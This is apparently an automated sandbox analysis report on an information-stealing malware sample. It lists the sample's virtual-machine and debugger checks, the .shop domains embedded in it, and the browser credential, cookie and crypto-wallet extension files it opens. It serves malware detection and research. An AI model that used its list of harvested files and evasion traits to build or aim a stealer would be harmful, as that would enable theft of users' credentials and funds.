        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E7B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
        Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: Ljrprfl3BH.exe, 00000000.00000002.4666397816.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Ljrprfl3BH.exe, 00000000.00000003.4540378694.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: BF85.tmp.exe, 00000003.00000003.2321074257.0000000002E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeAPI call chain: ExitProcess graph end nodegraph_3-26386
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_004402C0 LdrInitializeThunk,3_2_004402C0
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC4E
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]0_2_0042FE4F
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0070905B push dword ptr fs:[00000030h]0_2_0070905B
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C00B6 mov eax, dword ptr fs:[00000030h]0_2_021C00B6
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0219092B mov eax, dword ptr fs:[00000030h]0_2_0219092B
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_02190D90 mov eax, dword ptr fs:[00000030h]0_2_02190D90
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00540083 push dword ptr fs:[00000030h]3_2_00540083
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_0075092B mov eax, dword ptr fs:[00000030h]3_2_0075092B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00750D90 mov eax, dword ptr fs:[00000030h]3_2_00750D90
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0043BBB1 GetProcessHeap,0_2_0043BBB1
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3C3
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104C3
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_00410656 SetUnhandledExceptionFilter,0_2_00410656
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F907
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021BA62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_021BA62A
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_021A072A
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0219FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0219FB6E
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021A08BD SetUnhandledExceptionFilter,0_2_021A08BD

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: BF85.tmp.exeString found in binary or memory: robinsharez.shop
        Source: BF85.tmp.exeString found in binary or memory: handscreamny.shop
        Source: BF85.tmp.exeString found in binary or memory: chipdonkeruz.shop
        Source: BF85.tmp.exeString found in binary or memory: versersleep.shop
        Source: BF85.tmp.exeString found in binary or memory: crowdwarek.shop
        Source: BF85.tmp.exeString found in binary or memory: apporholis.shop
        Source: BF85.tmp.exeString found in binary or memory: femalsabler.shop
        Source: BF85.tmp.exeString found in binary or memory: soundtappysk.shop
        Source: BF85.tmp.exeString found in binary or memory: skidjazzyric.click
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeProcess created: C:\Users\user\AppData\Local\Temp\BF85.tmp.exe "C:\Users\user\AppData\Local\Temp\BF85.tmp.exe" Jump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_0041076B cpuid 0_2_0041076B
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_004351B0
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_0043B272
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_0043B2BD
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_0043B358
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3E5
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_0043B635
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B75E
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_0043B865
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B932
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_00434DBD
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043AFFA
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_021CB261
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_021C5024
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_021C5417
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_021CB4D9
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_021CB524
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: EnumSystemLocalesW,0_2_021CB5BF
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_021CBACC
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_021CBB99
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,0_2_021CB89C
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_021CB9C5
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103BD
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
        Source: BF85.tmp.exe, 00000003.00000003.2320794953.0000000002E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3d;F
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: BF85.tmp.exe, 00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
